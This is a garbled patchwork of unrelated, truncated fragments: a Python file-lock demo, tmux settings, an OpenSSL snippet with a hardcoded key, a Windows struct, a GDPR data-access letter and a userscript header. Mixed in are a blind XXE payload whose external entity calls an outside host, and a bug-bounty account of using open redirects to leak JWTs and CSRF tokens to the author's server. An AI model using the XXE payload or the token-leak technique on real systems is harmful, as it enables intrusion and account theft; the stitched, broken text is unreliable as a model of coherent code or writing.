For educational reasons I've decided to create my own CA. Here is what I learned.
Let's get some context first.
Tested on Mac OS X 10.6.6 and Ubuntu 10.10 with Python 2.6.6
To try it out, open up a python shell and type:
>>> from lock import FileLock
>>> lock = FileLock("my_lock", dir="/var/tmp")
>>> lock.acquire()
Leave the first shell open, and open another python shell and type the same thing:
>>> from lock import FileLock
>>> lock = FileLock("my_lock", dir="/var/tmp")
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
#!/usr/bin/env bash
# set -x
if [[ $EUID -ne 0 ]]; then
    echo "You must be root to run this script"
    exit 1
fi
# Returns all available interfaces, except "lo" and "veth*".
# Set the control character to Ctrl+Spacebar (instead of Ctrl+B)
set -g prefix C-space
unbind-key C-b
bind-key C-space send-prefix
# Set new panes to open in current directory
bind c new-window -c "#{pane_current_path}"
bind '"' split-window -c "#{pane_current_path}"
bind % split-window -h -c "#{pane_current_path}"
#include <openssl/conf.h>
#include <openssl/evp.h>
#include <openssl/err.h>
#include <string.h>
int main (void)
{
  /* A 256 bit key */
  unsigned char *key = (unsigned char *)"01234567890123456789012345678901";
typedef struct tagCREATELINKDATA {
    ULONG dwFlags;
    WCHAR szLinkName[MAX_PATH]; // + 0x20C
    WCHAR szExeName[MAX_PATH]; // + 0x414
    WCHAR szParams[MAX_PATH]; // + 0x61C
    WCHAR szWorkingDir[MAX_PATH]; // + 0x824
    WCHAR szOriginalName[MAX_PATH]; // + 0xA2C
    WCHAR szExpExeName[MAX_PATH]; // + 0xC34
    WCHAR szProgDesc[MAX_PATH]; // + 0xE3C
    WCHAR szFolder[MAX_PATH]; // + 0x1044
Dear Sir/Madam:
I am writing to you in your capacity as data protection officer for your
company. In light of recent spam received on this email address,
I am making this request for access to personal data
pursuant to Article 15 of the General Data Protection Regulation.
I am concerned that your company’s information practices may be putting my
personal information at undue risk of exposure or in fact has breached its
obligation to safeguard my personal information.
An open redirect was almost everything I needed in two different bug bounty programs to get access to user accounts. In one of the cases a JWT was leaked, and in the other the CSRF token was leaked. The issue was mostly the same in both cases: not validating, or URI encoding, user input on the client side, and sending sensitive information to my server using an open redirect.
x-csrf-token
set to the CSRF token for the session of the user
GET /verify/VALUE HTTP/1.1
Host: example.com
// ==UserScript==
// @name noVNC Paste for Proxmox
// @namespace http://tampermonkey.net/
// @version 0.2a
// @description Pastes text into a noVNC window (for use with Proxmox specifically)
// @author Chester Enright
// @match https://*
// @include /^.*novnc.*/
// @require http://code.jquery.com/jquery-3.3.1.min.js
// @grant none